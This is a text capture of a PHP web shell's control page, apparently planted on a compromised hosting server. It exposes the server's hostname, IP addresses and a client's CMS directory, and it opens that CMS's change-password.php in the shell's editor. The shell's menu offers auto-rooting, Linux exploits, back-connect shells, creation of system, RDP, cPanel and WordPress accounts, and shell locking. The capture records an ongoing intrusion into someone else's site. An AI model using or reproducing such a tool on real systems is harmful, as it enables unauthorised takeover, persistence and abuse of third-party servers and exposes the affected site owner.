Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 13.59.26.63
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
CMS-NEW /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
validations
[ DIR ]
drwxr-xr-x
404.php
1.5
KB
-rw-r--r--
add-keyword.php
5.24
KB
-rw-r--r--
assign-service.php
6.59
KB
-rw-r--r--
blank-page.php
486
B
-rw-r--r--
category-excel.php
2.02
KB
-rw-r--r--
category.php
5.59
KB
-rw-r--r--
change-password.php
1.87
KB
-rw-r--r--
dashboard.php
22.39
KB
-rw-r--r--
edit-profile.php
4.68
KB
-rw-r--r--
error_log
5.84
KB
-rw-r--r--
forgot-password.php
2.08
KB
-rw-r--r--
keywords.php
6.24
KB
-rw-r--r--
login.php
4.83
KB
-rw-r--r--
logout.php
194
B
-rw-r--r--
register.php
5.98
KB
-rw-r--r--
user-excel.php
2.11
KB
-rw-r--r--
user.php
3.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : change-password.php
<?php include("include/header.php"); ?> <div class="page-wrapper"> <?php include("include/top-nav.php"); ?> <div class="page-content"> <nav class="page-breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="#"> Edit</a></li> <li class="breadcrumb-item active" aria-current="page">Change Password</li> </ol> </nav> <div class="row"> <div class="col-md-6 offset-md-3 grid-margin stretch-card"> <div class="card"> <div class="card-body"> <h6 class="card-title">Change Your Profile</h6> <form class="forms-sample" id="myform1" name="myform1"> <div class="form-group"> <label for="exampleInputUsername1">Old Password</label> <input type="text" class="form-control validate[required]" placeholder="Old Password" name="old_psd"> </div> <div class="form-group"> <label for="exampleInputUsername1">New Password</label> <input type="text" class="form-control validate[required,minSize[8]]" placeholder="New Password" name="new_psd"> </div> <div class="form-group"> <label for="exampleInputUsername1">Confirm Password</label> <input type="text" class="form-control" placeholder="Confirm Password" name="conf_psd"> </div> <input type="hidden" name="caseno" value="<?php echo base64_encode('4'); ?>"> <input type="hidden" name="user_id" value="<?php echo $usr['id']; ?>"> <div id="msg" class="col-md-12"></div> <button type="submit" class="btn btn-primary mr-2">Update</button> <button class="btn btn-light"><a href="dashboard.php">Cancel<a></button> </form> </div> </div> </div> </div> </div> <?php include("include/footer.php"); ?>
Close